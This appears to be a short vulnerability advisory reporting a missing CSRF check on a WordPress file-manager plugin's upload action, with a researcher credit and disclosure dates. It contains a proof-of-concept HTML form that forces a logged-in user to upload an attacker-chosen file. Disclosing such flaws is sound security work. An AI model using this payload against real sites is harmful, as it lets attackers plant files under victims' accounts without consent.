The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in users upload files on their behalf
<form action="https://example.com.com/wp-admin/admin-ajax.php?action=wpfm_upload_file" method="POST" enctype="multipart/form-data"> <input type="file" name="file" value=""> <input type="text" name="_file" value="payload.pdf"> <input type="submit" name="submit" value="submit"> </form> The file won't show up via the frontend/backend, but will be uploaded in the user folder (ie in wp-content/uploads/user_uploads/<usernname>/payload.pdf)
Raad Haddad of Cloudyrion GmbH
Raad Haddad of Cloudyrion GmbH
Yes
2022-09-26 (about 8 months ago)
2022-09-26 (about 8 months ago)
2022-09-26 (about 8 months ago)